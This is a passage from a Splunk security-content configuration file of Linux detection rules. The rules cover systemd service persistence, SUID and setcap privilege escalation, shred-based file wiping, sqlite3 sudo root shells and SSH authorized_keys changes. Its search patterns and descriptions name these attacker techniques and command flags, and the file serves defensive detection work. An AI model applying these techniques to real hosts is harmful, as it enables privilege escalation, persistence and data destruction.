action.escu.enabled = 1 description = The following analytic is designed to detect suspicious file creation within the systemd timer directory on Linux platforms. Systemd is a system and service manager for Linux, similar to the combination of wininit.exe and services.exe on Windows. This process initializes a Linux system and starts defined services in unit files. Malicious actors, such as adversaries, malware, or red teamers, can exploit this feature by embedding a systemd service file for persistence on the targeted or compromised host.\ The analytic works by monitoring logs with file name, file path, and process GUID data from your endpoints. If a .service file is created in certain systemd directories, the analytic triggers an alert. This behavior is significant for a Security Operations Center (SOC) as it may indicate a persistent threat within the network, with a potential impact of system compromise or data exfiltration. action.escu.mappings = {"cis20": ["CIS 10"], "kill_chain_phases": ["Installation", "Exploitation"], "mitre_attack": ["T1053.006", "T1053"], "nist": ["DE.AE"]} action.escu.data_models = ["Endpoint"] action.escu.eli5 = The following analytic is designed to detect suspicious file creation within the systemd timer directory on Linux platforms. Systemd is a system and service manager for Linux, similar to the combination of wininit.exe and services.exe on Windows. This process initializes a Linux system and starts defined services in unit files. Malicious actors, such as adversaries, malware, or red teamers, can exploit this feature by embedding a systemd service file for persistence on the targeted or compromised host.\ The analytic works by monitoring logs with file name, file path, and process GUID data from your endpoints. If a .service file is created in certain systemd directories, the analytic triggers an alert. This behavior is significant for a Security Operations Center (SOC) as it may indicate a persistent threat within the network, with a potential impact of system compromise or data exfiltration. action.escu.how_to_implement = To successfully implement this search, you need to be ingesting logs with the file name, file path, and process_guid executions from your endpoints. If you are using Sysmon, you can use the Add-on for Linux Sysmon from Splunkbase. action.escu.known_false_positives = False positives may arise when administrators or network operators create files in systemd directories for legitimate automation tasks. Therefore, it's important to adjust filter macros to account for valid activities. To implement this search successfully, it's crucial to ingest appropriate logs, preferably using the Linux Sysmon Add-on from Splunkbase for those using Sysmon. action.escu.creation_date = 2021-12-20 action.escu.modification_date = 2021-12-20 action.escu.confidence = high action.escu.full_search_name = ESCU - Linux Service File Created In Systemd Directory - Rule action.escu.search_type = detection action.escu.product = ["Splunk Enterprise", "Splunk Enterprise Security", "Splunk Cloud"] action.escu.providing_technologies = ["Sysmon", "Microsoft Windows", "Carbon Black Response", "CrowdStrike Falcon", "Symantec Endpoint Protection"] action.escu.analytic_story = ["Linux Privilege Escalation", "Linux Persistence Techniques", "Linux Living Off The Land", "Scheduled Tasks"] action.risk = 1 action.risk.param._risk_message = A service file named as $file_path$ is created in systemd folder on $dest$ action.risk.param._risk = [{"risk_object_field": "dest", "risk_object_type": "system", "risk_score": 64}] action.risk.param._risk_score = 0 action.risk.param.verbose = 0 cron_schedule = 0 * * * * dispatch.earliest_time = -70m@m dispatch.latest_time = -10m@m action.correlationsearch.enabled = 1 action.correlationsearch.label = ESCU - Linux Service File Created In Systemd Directory - Rule action.correlationsearch.annotations = {"analytic_story": ["Linux Privilege Escalation", "Linux Persistence Techniques", "Linux Living Off The Land", "Scheduled Tasks"], "cis20": ["CIS 10"], "confidence": 80, "impact": 80, "kill_chain_phases": ["Installation", "Exploitation"], "mitre_attack": ["T1053.006", "T1053"], "nist": ["DE.AE"]} schedule_window = auto alert.digest_mode = 1 disabled = true enableSched = 1 allow_skew = 100% counttype = number of events relation = greater than quantity = 0 realtime_schedule = 0 is_visible = false search = | tstats `security_content_summariesonly` count min(_time) as firstTime max(_time) as lastTime FROM datamodel=Endpoint.Filesystem where Filesystem.file_name = *.service Filesystem.file_path IN ("*/etc/systemd/system*", "*/lib/systemd/system*", "*/usr/lib/systemd/system*", "*/run/systemd/system*", "*~/.config/systemd/*", "*~/.local/share/systemd/*","*/etc/systemd/user*", "*/lib/systemd/user*", "*/usr/lib/systemd/user*", "*/run/systemd/user*") by Filesystem.dest Filesystem.file_create_time Filesystem.file_name Filesystem.process_guid Filesystem.file_path | `drop_dm_object_name(Filesystem)` | `security_content_ctime(lastTime)` | `security_content_ctime(firstTime)` | `linux_service_file_created_in_systemd_directory_filter` [ESCU - Linux Service Restarted - Rule] action.escu = 0 action.escu.enabled = 1 description = The following analytic detects the restarting or re-enabling of services in the Linux platform. It focuses on the use of the systemctl or service tools for executing these actions. Adversaries may leverage this technique to repeatedly execute malicious payloads as a form of persistence. Linux hosts typically start services during boot to perform background system functions. However, administrators may also create legitimate services for specific tools or applications as part of task automation. In such cases, it is recommended to verify the service path of the registered script or executable and identify the creator of the service for further validation.\ It's important to be aware that this analytic may generate false positives as administrators or network operators may use the same command-line for legitimate automation purposes. Filter macros should be updated accordingly to minimize false positives.\ Identifying restarted or re-enabled services is valuable for a SOC as it can indicate potential malicious activities attempting to maintain persistence or execute unauthorized actions on Linux systems. By detecting and investigating these events, security analysts can respond promptly to mitigate risks and prevent further compromise. The impact of a true positive can range from unauthorized access to data destruction or other damaging outcomes. action.escu.mappings = {"cis20": ["CIS 10"], "kill_chain_phases": ["Installation", "Exploitation"], "mitre_attack": ["T1053.006", "T1053"], "nist": ["DE.AE"]} action.escu.data_models = ["Endpoint"] action.escu.eli5 = The following analytic detects the restarting or re-enabling of services in the Linux platform. It focuses on the use of the systemctl or service tools for executing these actions. Adversaries may leverage this technique to repeatedly execute malicious payloads as a form of persistence. Linux hosts typically start services during boot to perform background system functions. However, administrators may also create legitimate services for specific tools or applications as part of task automation. In such cases, it is recommended to verify the service path of the registered script or executable and identify the creator of the service for further validation.\ It's important to be aware that this analytic may generate false positives as administrators or network operators may use the same command-line for legitimate automation purposes. Filter macros should be updated accordingly to minimize false positives.\ Identifying restarted or re-enabled services is valuable for a SOC as it can indicate potential malicious activities attempting to maintain persistence or execute unauthorized actions on Linux systems. By detecting and investigating these events, security analysts can respond promptly to mitigate risks and prevent further compromise. The impact of a true positive can range from unauthorized access to data destruction or other damaging outcomes. action.escu.how_to_implement = The detection is based on data that originates from Endpoint Detection and Response (EDR) agents. These agents are designed to provide security-related telemetry from the endpoints where the agent is installed. To implement this search, you must ingest logs that contain the process GUID, process name, and parent process. Additionally, you must ingest complete command-line executions. These logs must be processed using the appropriate Splunk Technology Add-ons that are specific to the EDR product. The logs must also be mapped to the `Processes` node of the `Endpoint` data model. Use the Splunk Common Information Model (CIM) to normalize the field names and speed up the data modeling process. action.escu.known_false_positives = Administrator or network operator can use this commandline for automation purposes. Please update the filter macros to remove false positives. action.escu.creation_date = 2023-04-14 action.escu.modification_date = 2023-04-14 action.escu.confidence = high action.escu.full_search_name = ESCU - Linux Service Restarted - Rule action.escu.search_type = detection action.escu.product = ["Splunk Enterprise", "Splunk Enterprise Security", "Splunk Cloud"] action.escu.providing_technologies = ["Sysmon", "Microsoft Windows", "Carbon Black Response", "CrowdStrike Falcon", "Symantec Endpoint Protection"] action.escu.analytic_story = ["AwfulShred", "Linux Privilege Escalation", "Linux Living Off The Land", "Data Destruction", "Linux Persistence Techniques", "Scheduled Tasks"] action.risk = 1 action.risk.param._risk_message = A commandline $process$ that may create or start a service on $dest$ action.risk.param._risk = [{"risk_object_field": "dest", "risk_object_type": "system", "risk_score": 25}] action.risk.param._risk_score = 0 action.risk.param.verbose = 0 cron_schedule = 0 * * * * dispatch.earliest_time = -70m@m dispatch.latest_time = -10m@m action.correlationsearch.enabled = 1 action.correlationsearch.label = ESCU - Linux Service Restarted - Rule action.correlationsearch.annotations = {"analytic_story": ["AwfulShred", "Linux Privilege Escalation", "Linux Living Off The Land", "Data Destruction", "Linux Persistence Techniques", "Scheduled Tasks"], "cis20": ["CIS 10"], "confidence": 50, "impact": 50, "kill_chain_phases": ["Installation", "Exploitation"], "mitre_attack": ["T1053.006", "T1053"], "nist": ["DE.AE"]} schedule_window = auto alert.digest_mode = 1 disabled = true enableSched = 1 allow_skew = 100% counttype = number of events relation = greater than quantity = 0 realtime_schedule = 0 is_visible = false search = | tstats `security_content_summariesonly` count min(_time) as firstTime max(_time) as lastTime from datamodel=Endpoint.Processes where (Processes.process_name IN ("systemctl", "service") OR Processes.process IN ("*systemctl *", "*service *")) Processes.process IN ("*restart*", "*reload*", "*reenable*") by Processes.dest Processes.user Processes.parent_process_name Processes.process_name Processes.process Processes.process_id Processes.parent_process_id Processes.process_guid | `drop_dm_object_name(Processes)` | `security_content_ctime(firstTime)` | `security_content_ctime(lastTime)` | `linux_service_restarted_filter` [ESCU - Linux Service Started Or Enabled - Rule] action.escu = 0 action.escu.enabled = 1 description = The following analytic detects the creation or enabling of services in Linux platforms, specifically using the systemctl or service tool application. This behavior is worth identifying as adversaries may create or modify services to execute malicious payloads as part of persistence. Legitimate services created by administrators for automation purposes may also trigger this analytic, so it is important to update the filter macros to remove false positives. If a true positive is found, it suggests an possible attacker is attempting to persist within the environment or deliver additional malicious payloads, leading to data theft, ransomware, or other damaging outcomes. To implement this analytic, ensure you are ingesting logs with the process name, parent process, and command-line executions from your endpoints. action.escu.mappings = {"cis20": ["CIS 10"], "kill_chain_phases": ["Installation", "Exploitation"], "mitre_attack": ["T1053.006", "T1053"], "nist": ["DE.AE"]} action.escu.data_models = ["Endpoint"] action.escu.eli5 = The following analytic detects the creation or enabling of services in Linux platforms, specifically using the systemctl or service tool application. This behavior is worth identifying as adversaries may create or modify services to execute malicious payloads as part of persistence. Legitimate services created by administrators for automation purposes may also trigger this analytic, so it is important to update the filter macros to remove false positives. If a true positive is found, it suggests an possible attacker is attempting to persist within the environment or deliver additional malicious payloads, leading to data theft, ransomware, or other damaging outcomes. To implement this analytic, ensure you are ingesting logs with the process name, parent process, and command-line executions from your endpoints. action.escu.how_to_implement = The detection is based on data that originates from Endpoint Detection and Response (EDR) agents. These agents are designed to provide security-related telemetry from the endpoints where the agent is installed. To implement this search, you must ingest logs that contain the process GUID, process name, and parent process. Additionally, you must ingest complete command-line executions. These logs must be processed using the appropriate Splunk Technology Add-ons that are specific to the EDR product. The logs must also be mapped to the `Processes` node of the `Endpoint` data model. Use the Splunk Common Information Model (CIM) to normalize the field names and speed up the data modeling process. action.escu.known_false_positives = Administrator or network operator can use this commandline for automation purposes. Please update the filter macros to remove false positives. action.escu.creation_date = 2024-01-24 action.escu.modification_date = 2024-01-24 action.escu.confidence = high action.escu.full_search_name = ESCU - Linux Service Started Or Enabled - Rule action.escu.search_type = detection action.escu.product = ["Splunk Enterprise", "Splunk Enterprise Security", "Splunk Cloud"] action.escu.providing_technologies = ["Sysmon", "Microsoft Windows", "Carbon Black Response", "CrowdStrike Falcon", "Symantec Endpoint Protection"] action.escu.analytic_story = ["Linux Privilege Escalation", "Linux Persistence Techniques", "Linux Living Off The Land", "Scheduled Tasks"] action.risk = 1 action.risk.param._risk_message = a commandline $process$ that may create or start a service on $dest action.risk.param._risk = [{"risk_object_field": "dest", "risk_object_type": "system", "risk_score": 42}] action.risk.param._risk_score = 0 action.risk.param.verbose = 0 cron_schedule = 0 * * * * dispatch.earliest_time = -70m@m dispatch.latest_time = -10m@m action.correlationsearch.enabled = 1 action.correlationsearch.label = ESCU - Linux Service Started Or Enabled - Rule action.correlationsearch.annotations = {"analytic_story": ["Linux Privilege Escalation", "Linux Persistence Techniques", "Linux Living Off The Land", "Scheduled Tasks"], "cis20": ["CIS 10"], "confidence": 70, "impact": 60, "kill_chain_phases": ["Installation", "Exploitation"], "mitre_attack": ["T1053.006", "T1053"], "nist": ["DE.AE"]} schedule_window = auto alert.digest_mode = 1 disabled = true enableSched = 1 allow_skew = 100% counttype = number of events relation = greater than quantity = 0 realtime_schedule = 0 is_visible = false search = | tstats `security_content_summariesonly` count min(_time) as firstTime max(_time) as lastTime from datamodel=Endpoint.Processes where (Processes.process_name IN ("systemctl", "service") OR Processes.process IN ("*systemctl *", "*service *")) Processes.process IN ("* start *", "* enable *") AND NOT (Processes.os="Microsoft Windows" OR Processes.vendor_product="Microsoft Windows") by Processes.dest Processes.user Processes.parent_process_name Processes.process_name Processes.process Processes.process_id Processes.parent_process_id Processes.process_guid | `drop_dm_object_name(Processes)` | `security_content_ctime(firstTime)` | `security_content_ctime(lastTime)` | `linux_service_started_or_enabled_filter` [ESCU - Linux Setuid Using Chmod Utility - Rule] action.escu = 0 action.escu.enabled = 1 description = This analytic looks for suspicious chmod utility execution to enable SUID bit. This allows a user to temporarily gain root access, usually in order to run a program. For example, only the root account is allowed to change the password information contained in the password database; If the SUID bit appears as an s, the file's owner also has execute permission to the file; if it appears as an S, the file's owner does not have execute permission. The second specialty permission is the SGID, or set group id bit. It is similar to the SUID bit, except it can temporarily change group membership, usually to execute a program. The SGID bit is set if an s or an S appears in the group section of permissions. action.escu.mappings = {"cis20": ["CIS 10"], "kill_chain_phases": ["Exploitation"], "mitre_attack": ["T1548.001", "T1548"], "nist": ["DE.AE"]} action.escu.data_models = ["Endpoint"] action.escu.eli5 = This analytic looks for suspicious chmod utility execution to enable SUID bit. This allows a user to temporarily gain root access, usually in order to run a program. For example, only the root account is allowed to change the password information contained in the password database; If the SUID bit appears as an s, the file's owner also has execute permission to the file; if it appears as an S, the file's owner does not have execute permission. The second specialty permission is the SGID, or set group id bit. It is similar to the SUID bit, except it can temporarily change group membership, usually to execute a program. The SGID bit is set if an s or an S appears in the group section of permissions. action.escu.how_to_implement = The detection is based on data that originates from Endpoint Detection and Response (EDR) agents. These agents are designed to provide security-related telemetry from the endpoints where the agent is installed. To implement this search, you must ingest logs that contain the process GUID, process name, and parent process. Additionally, you must ingest complete command-line executions. These logs must be processed using the appropriate Splunk Technology Add-ons that are specific to the EDR product. The logs must also be mapped to the `Processes` node of the `Endpoint` data model. Use the Splunk Common Information Model (CIM) to normalize the field names and speed up the data modeling process. action.escu.known_false_positives = Administrator or network operator can execute this command. Please update the filter macros to remove false positives. action.escu.creation_date = 2021-12-21 action.escu.modification_date = 2021-12-21 action.escu.confidence = high action.escu.full_search_name = ESCU - Linux Setuid Using Chmod Utility - Rule action.escu.search_type = detection action.escu.product = ["Splunk Enterprise", "Splunk Enterprise Security", "Splunk Cloud"] action.escu.providing_technologies = ["Sysmon", "Microsoft Windows", "Carbon Black Response", "CrowdStrike Falcon", "Symantec Endpoint Protection"] action.escu.analytic_story = ["Linux Privilege Escalation", "Linux Persistence Techniques", "Linux Living Off The Land"] action.risk = 1 action.risk.param._risk_message = a commandline $process$ that may set suid or sgid on $dest$ action.risk.param._risk = [{"risk_object_field": "dest", "risk_object_type": "system", "risk_score": 49}] action.risk.param._risk_score = 0 action.risk.param.verbose = 0 cron_schedule = 0 * * * * dispatch.earliest_time = -70m@m dispatch.latest_time = -10m@m action.correlationsearch.enabled = 1 action.correlationsearch.label = ESCU - Linux Setuid Using Chmod Utility - Rule action.correlationsearch.annotations = {"analytic_story": ["Linux Privilege Escalation", "Linux Persistence Techniques", "Linux Living Off The Land"], "cis20": ["CIS 10"], "confidence": 70, "impact": 70, "kill_chain_phases": ["Exploitation"], "mitre_attack": ["T1548.001", "T1548"], "nist": ["DE.AE"]} schedule_window = auto alert.digest_mode = 1 disabled = true enableSched = 1 allow_skew = 100% counttype = number of events relation = greater than quantity = 0 realtime_schedule = 0 is_visible = false search = | tstats `security_content_summariesonly` count min(_time) as firstTime max(_time) as lastTime from datamodel=Endpoint.Processes WHERE (Processes.process_name = chmod OR Processes.process = "*chmod *") AND Processes.process IN("* g+s *", "* u+s *", "* 4777 *", "* 4577 *") by Processes.dest Processes.user Processes.parent_process_name Processes.process_name Processes.process Processes.process_id Processes.parent_process_id Processes.process_guid | `drop_dm_object_name(Processes)` | `security_content_ctime(firstTime)` | `security_content_ctime(lastTime)` | `linux_setuid_using_chmod_utility_filter` [ESCU - Linux Setuid Using Setcap Utility - Rule] action.escu = 0 action.escu.enabled = 1 description = This analytic looks for suspicious setcap utility execution to enable SUID bit. This allows a user to temporarily gain root access, usually in order to run a program. For example, only the root account is allowed to change the password information contained in the password database; If the SUID bit appears as an s, the file's owner also has execute permission to the file; if it appears as an S, the file's owner does not have execute permission. The second specialty permission is the SGID, or set group id bit. It is similar to the SUID bit, except it can temporarily change group membership, usually to execute a program. The SGID bit is set if an s or an S appears in the group section of permissions. action.escu.mappings = {"cis20": ["CIS 10"], "kill_chain_phases": ["Exploitation"], "mitre_attack": ["T1548.001", "T1548"], "nist": ["DE.AE"]} action.escu.data_models = ["Endpoint"] action.escu.eli5 = This analytic looks for suspicious setcap utility execution to enable SUID bit. This allows a user to temporarily gain root access, usually in order to run a program. For example, only the root account is allowed to change the password information contained in the password database; If the SUID bit appears as an s, the file's owner also has execute permission to the file; if it appears as an S, the file's owner does not have execute permission. The second specialty permission is the SGID, or set group id bit. It is similar to the SUID bit, except it can temporarily change group membership, usually to execute a program. The SGID bit is set if an s or an S appears in the group section of permissions. action.escu.how_to_implement = The detection is based on data that originates from Endpoint Detection and Response (EDR) agents. These agents are designed to provide security-related telemetry from the endpoints where the agent is installed. To implement this search, you must ingest logs that contain the process GUID, process name, and parent process. Additionally, you must ingest complete command-line executions. These logs must be processed using the appropriate Splunk Technology Add-ons that are specific to the EDR product. The logs must also be mapped to the `Processes` node of the `Endpoint` data model. Use the Splunk Common Information Model (CIM) to normalize the field names and speed up the data modeling process. action.escu.known_false_positives = Administrator or network operator can execute this command. Please update the filter macros to remove false positives. action.escu.creation_date = 2021-12-21 action.escu.modification_date = 2021-12-21 action.escu.confidence = high action.escu.full_search_name = ESCU - Linux Setuid Using Setcap Utility - Rule action.escu.search_type = detection action.escu.product = ["Splunk Enterprise", "Splunk Enterprise Security", "Splunk Cloud"] action.escu.providing_technologies = ["Sysmon", "Microsoft Windows", "Carbon Black Response", "CrowdStrike Falcon", "Symantec Endpoint Protection"] action.escu.analytic_story = ["Linux Privilege Escalation", "Linux Persistence Techniques"] action.risk = 1 action.risk.param._risk_message = A commandline $process$ that may set suid or sgid on $dest$ action.risk.param._risk = [{"risk_object_field": "dest", "risk_object_type": "system", "risk_score": 49}] action.risk.param._risk_score = 0 action.risk.param.verbose = 0 cron_schedule = 0 * * * * dispatch.earliest_time = -70m@m dispatch.latest_time = -10m@m action.correlationsearch.enabled = 1 action.correlationsearch.label = ESCU - Linux Setuid Using Setcap Utility - Rule action.correlationsearch.annotations = {"analytic_story": ["Linux Privilege Escalation", "Linux Persistence Techniques"], "cis20": ["CIS 10"], "confidence": 70, "impact": 70, "kill_chain_phases": ["Exploitation"], "mitre_attack": ["T1548.001", "T1548"], "nist": ["DE.AE"]} schedule_window = auto alert.digest_mode = 1 disabled = true enableSched = 1 allow_skew = 100% counttype = number of events relation = greater than quantity = 0 realtime_schedule = 0 is_visible = false search = | tstats `security_content_summariesonly` count min(_time) as firstTime max(_time) as lastTime from datamodel=Endpoint.Processes where (Processes.process_name = setcap OR Processes.process = "*setcap *") AND Processes.process IN ("* cap_setuid=ep *", "* cap_setuid+ep *", "* cap_net_bind_service+p *", "* cap_net_raw+ep *", "* cap_dac_read_search+ep *") by Processes.dest Processes.user Processes.parent_process_name Processes.process_name Processes.process Processes.process_id Processes.parent_process_id Processes.process_guid | `drop_dm_object_name(Processes)` | `security_content_ctime(firstTime)` | `security_content_ctime(lastTime)` | `linux_setuid_using_setcap_utility_filter` [ESCU - Linux Shred Overwrite Command - Rule] action.escu = 0 action.escu.enabled = 1 description = This analytic is to detect a shred process to overwrite a files in a linux machine. Shred Linux application is designed to overwrite file to hide its contents or make the deleted file un-recoverable. Weve seen this technique in industroyer2 malware that tries to wipe energy facilities of targeted sector as part of its destructive attack. It might be some normal user may use this command for valid purposes but it is recommended to check what files, disk or folder it tries to shred that might be good pivot for incident response in this type of destructive malware. action.escu.mappings = {"cis20": ["CIS 10"], "kill_chain_phases": ["Actions on Objectives"], "mitre_attack": ["T1485"], "nist": ["DE.CM"]} action.escu.data_models = ["Endpoint"] action.escu.eli5 = This analytic is to detect a shred process to overwrite a files in a linux machine. Shred Linux application is designed to overwrite file to hide its contents or make the deleted file un-recoverable. Weve seen this technique in industroyer2 malware that tries to wipe energy facilities of targeted sector as part of its destructive attack. It might be some normal user may use this command for valid purposes but it is recommended to check what files, disk or folder it tries to shred that might be good pivot for incident response in this type of destructive malware. action.escu.how_to_implement = The detection is based on data that originates from Endpoint Detection and Response (EDR) agents. These agents are designed to provide security-related telemetry from the endpoints where the agent is installed. To implement this search, you must ingest logs that contain the process GUID, process name, and parent process. Additionally, you must ingest complete command-line executions. These logs must be processed using the appropriate Splunk Technology Add-ons that are specific to the EDR product. The logs must also be mapped to the `Processes` node of the `Endpoint` data model. Use the Splunk Common Information Model (CIM) to normalize the field names and speed up the data modeling process. action.escu.known_false_positives = Administrator or network operator can use this application for automation purposes. Please update the filter macros to remove false positives. action.escu.creation_date = 2023-04-14 action.escu.modification_date = 2023-04-14 action.escu.confidence = high action.escu.full_search_name = ESCU - Linux Shred Overwrite Command - Rule action.escu.search_type = detection action.escu.product = ["Splunk Enterprise", "Splunk Enterprise Security", "Splunk Cloud"] action.escu.providing_technologies = ["Sysmon", "Microsoft Windows", "Carbon Black Response", "CrowdStrike Falcon", "Symantec Endpoint Protection"] action.escu.analytic_story = ["Industroyer2", "AwfulShred", "Linux Privilege Escalation", "Data Destruction", "Linux Persistence Techniques"] action.risk = 1 action.risk.param._risk_message = A possible shred overwrite command $process$ executed on $dest$ action.risk.param._risk = [{"risk_object_field": "dest", "risk_object_type": "system", "risk_score": 49}] action.risk.param._risk_score = 0 action.risk.param.verbose = 0 cron_schedule = 0 * * * * dispatch.earliest_time = -70m@m dispatch.latest_time = -10m@m action.correlationsearch.enabled = 1 action.correlationsearch.label = ESCU - Linux Shred Overwrite Command - Rule action.correlationsearch.annotations = {"analytic_story": ["Industroyer2", "AwfulShred", "Linux Privilege Escalation", "Data Destruction", "Linux Persistence Techniques"], "cis20": ["CIS 10"], "confidence": 70, "impact": 70, "kill_chain_phases": ["Actions on Objectives"], "mitre_attack": ["T1485"], "nist": ["DE.CM"]} schedule_window = auto action.notable = 1 action.notable.param.nes_fields = user,dest action.notable.param.rule_description = This analytic is to detect a shred process to overwrite a files in a linux machine. Shred Linux application is designed to overwrite file to hide its contents or make the deleted file un-recoverable. Weve seen this technique in industroyer2 malware that tries to wipe energy facilities of targeted sector as part of its destructive attack. It might be some normal user may use this command for valid purposes but it is recommended to check what files, disk or folder it tries to shred that might be good pivot for incident response in this type of destructive malware. action.notable.param.rule_title = Linux Shred Overwrite Command action.notable.param.security_domain = endpoint action.notable.param.severity = high alert.digest_mode = 1 disabled = true enableSched = 1 allow_skew = 100% counttype = number of events relation = greater than quantity = 0 realtime_schedule = 0 is_visible = false search = | tstats `security_content_summariesonly` count min(_time) as firstTime max(_time) as lastTime from datamodel=Endpoint.Processes where Processes.process_name =shred AND Processes.process IN ("*-n*", "*-u*", "*-z*", "*-s*") by Processes.parent_process_name Processes.process_name Processes.process Processes.process_id Processes.parent_process_id Processes.process_guid Processes.dest Processes.user | `drop_dm_object_name(Processes)` | `security_content_ctime(firstTime)` | `security_content_ctime(lastTime)` | `linux_shred_overwrite_command_filter` [ESCU - Linux Sqlite3 Privilege Escalation - Rule] action.escu = 0 action.escu.enabled = 1 description = sqlite3 is a terminal-based front-end to the SQLite library that can evaluate queries interactively and display the results in multiple formats. sqlite3 can also be used within shell scripts and other applications to provide batch processing features. If sudo right is given to this application for the user, then the user can run system commands as root and possibly get a root shell. action.escu.mappings = {"cis20": ["CIS 10"], "kill_chain_phases": ["Exploitation"], "mitre_attack": ["T1548.003", "T1548"], "nist": ["DE.AE"]} action.escu.data_models = ["Endpoint"] action.escu.eli5 = sqlite3 is a terminal-based front-end to the SQLite library that can evaluate queries interactively and display the results in multiple formats. sqlite3 can also be used within shell scripts and other applications to provide batch processing features. If sudo right is given to this application for the user, then the user can run system commands as root and possibly get a root shell. action.escu.how_to_implement = The detection is based on data that originates from Endpoint Detection and Response (EDR) agents. These agents are designed to provide security-related telemetry from the endpoints where the agent is installed. To implement this search, you must ingest logs that contain the process GUID, process name, and parent process. Additionally, you must ingest complete command-line executions. These logs must be processed using the appropriate Splunk Technology Add-ons that are specific to the EDR product. The logs must also be mapped to the `Processes` node of the `Endpoint` data model. Use the Splunk Common Information Model (CIM) to normalize the field names and speed up the data modeling process. action.escu.known_false_positives = False positives may be present, filter as needed. action.escu.creation_date = 2022-08-11 action.escu.modification_date = 2022-08-11 action.escu.confidence = high action.escu.full_search_name = ESCU - Linux Sqlite3 Privilege Escalation - Rule action.escu.search_type = detection action.escu.product = ["Splunk Enterprise", "Splunk Enterprise Security", "Splunk Cloud"] action.escu.providing_technologies = ["Sysmon", "Microsoft Windows", "Carbon Black Response", "CrowdStrike Falcon", "Symantec Endpoint Protection"] action.escu.analytic_story = ["Linux Privilege Escalation", "Linux Living Off The Land"] action.risk = 1 action.risk.param._risk_message = An instance of $parent_process_name$ spawning $process_name$ was identified on endpoint $dest$ action.risk.param._risk = [{"risk_object_field": "dest", "risk_object_type": "system", "risk_score": 30}, {"risk_object_field": "parent_process_name", "risk_object_type": "other", "risk_score": 30}, {"risk_object_field": "process_name", "risk_object_type": "other", "risk_score": 30}] action.risk.param._risk_score = 0 action.risk.param.verbose = 0 cron_schedule = 0 * * * * dispatch.earliest_time = -70m@m dispatch.latest_time = -10m@m action.correlationsearch.enabled = 1 action.correlationsearch.label = ESCU - Linux Sqlite3 Privilege Escalation - Rule action.correlationsearch.annotations = {"analytic_story": ["Linux Privilege Escalation", "Linux Living Off The Land"], "cis20": ["CIS 10"], "confidence": 50, "impact": 60, "kill_chain_phases": ["Exploitation"], "mitre_attack": ["T1548.003", "T1548"], "nist": ["DE.AE"]} schedule_window = auto alert.digest_mode = 1 disabled = true enableSched = 1 allow_skew = 100% counttype = number of events relation = greater than quantity = 0 realtime_schedule = 0 is_visible = false search = | tstats `security_content_summariesonly` count min(_time) as firstTime max(_time) as lastTime from datamodel=Endpoint.Processes where Processes.process="*sqlite3*" AND Processes.process="*.shell*" AND Processes.process="*sudo*" by Processes.dest Processes.user Processes.parent_process_name Processes.process_name Processes.process Processes.process_id Processes.parent_process_id Processes.process_guid | `drop_dm_object_name(Processes)` | `security_content_ctime(firstTime)` | `security_content_ctime(lastTime)` | `linux_sqlite3_privilege_escalation_filter` [ESCU - Linux SSH Authorized Keys Modification - Rule] action.escu = 0 action.escu.enabled = 1 description = The following analytic identifies based on process execution the modification of SSH Authorized Keys. Adversaries perform this behavior to persist on endpoints. During triage, review parallel processes and capture any additional file modifications for review. action.escu.mappings = {"cis20": ["CIS 10"], "kill_chain_phases": ["Installation", "Exploitation"], "mitre_attack": ["T1098.004"], "nist": ["DE.AE"]} action.escu.data_models = ["Endpoint"] action.escu.eli5 = The following analytic identifies based on process execution the modification of SSH Authorized Keys. Adversaries perform this behavior to persist on endpoints. During triage, review parallel processes and capture any additional file modifications for review. action.escu.how_to_implement = The detection is based on data that originates from Endpoint Detection and Response (EDR) agents. These agents are designed to provide security-related telemetry from the endpoints where the agent is installed. To implement this search, you must ingest logs that contain the process GUID, process name, and parent process. Additionally, you must ingest complete command-line executions. These logs must be processed using the appropriate Splunk Technology Add-ons that are specific to the EDR product. The logs must also be mapped to the `Processes` node of the `Endpoint` data model. Use the Splunk Common Information Model (CIM) to normalize the field names and speed up the data modeling process. action.escu.known_false_positives = Filtering will be required as system administrators will add and remove. One way to filter query is to add "echo". action.escu.creation_date = 2022-07-27 action.escu.modification_date = 2022-07-27 action.escu.confidence = high action.escu.full_search_name = ESCU - Linux SSH Authorized Keys Modification - Rule action.escu.search_type = detection action.escu.product = ["Splunk Enterprise", "Splunk Enterprise Security", "Splunk Cloud"] action.escu.providing_technologies = ["Sysmon", "Microsoft Windows", "Carbon Black Response", "CrowdStrike Falcon", "Symantec Endpoint Protection"] action.escu.analytic_story = ["Linux Living Off The Land"] action.risk = 1 action.risk.param._risk_message = An instance of $parent_process_name$ spawning $process_name$ was identified on endpoint $dest$ by user $user$ modifying SSH Authorized Keys. action.risk.param._risk = [{"risk_object_field": "user", "risk_object_type": "user", "risk_score": 15}, {"risk_object_field": "dest", "risk_object_type": "system", "risk_score": 15}, {"risk_object_field": "parent_process_name", "risk_object_type": "other", "risk_score": 15}, {"risk_object_field": "process_name", "risk_object_type": "other", "risk_score": 15}] action.risk.param._risk_score = 0 action.risk.param.verbose = 0 cron_schedule = 0 * * * * dispatch.earliest_time = -70m@m dispatch.latest_time = -10m@m action.correlationsearch.enabled = 1 action.correlationsearch.label = ESCU - Linux SSH Authorized Keys Modification - Rule action.correlationsearch.annotations = {"analytic_story": ["Linux Living Off The Land"], "cis20": ["CIS 10"], "confidence": 50, "impact": 30, "kill_chain_phases": ["Installation", "Exploitation"], "mitre_attack": ["T1098.004"], "nist": ["DE.AE"]} schedule_window = auto alert.digest_mode = 1 disabled = true enableSched = 1 allow_skew = 100% counttype = number of events relation = greater than quantity = 0 realtime_schedule = 0 is_visible = false search = | tstats `security_content_summariesonly` count min(_time) as firstTime max(_time) as lastTime from datamodel=Endpoint.Processes where Processes.process_name IN ("bash","cat") Processes.process IN ("*/authorized_keys*") by Processes.dest Processes.user Processes.parent_process_name Processes.process_name Processes.process Processes.process_id Processes.parent_process_id | `drop_dm_object_name(Processes)` | `security_content_ctime(firstTime)` | `security_content_ctime(lastTime)` | `linux_ssh_authorized_keys_modification_filter` [ESCU - Linux SSH Remote Services Script Execute - Rule] action.escu = 0 action.escu.enabled = 1 description = The following analytic identifies SSH being utilized to move laterally and execute a script or file on the remote host. action.escu.mappings = {"cis20": ["CIS 10"], "kill_chain_phases": ["Exploitation"], "mitre_attack": ["T1021.004"], "nist": ["DE.CM"]} action.escu.data_models = ["Endpoint"] action.escu.eli5 = The following analytic identifies SSH being utilized to move laterally and execute a script or file on the remote host. action.escu.how_to_implement = The detection is based on data that originates from Endpoint Detection and Response (EDR) agents. These agents are designed to provide security-related telemetry from the endpoints where the agent is installed. To implement this search, you must ingest logs that contain the process GUID, process name, and parent process. Additionally, you must ingest complete command-line executions. These logs must be processed using the appropriate Splunk Technology Add-ons that are specific to the EDR product. The logs must also be mapped to the `Processes` node of the `Endpoint` data model. Use 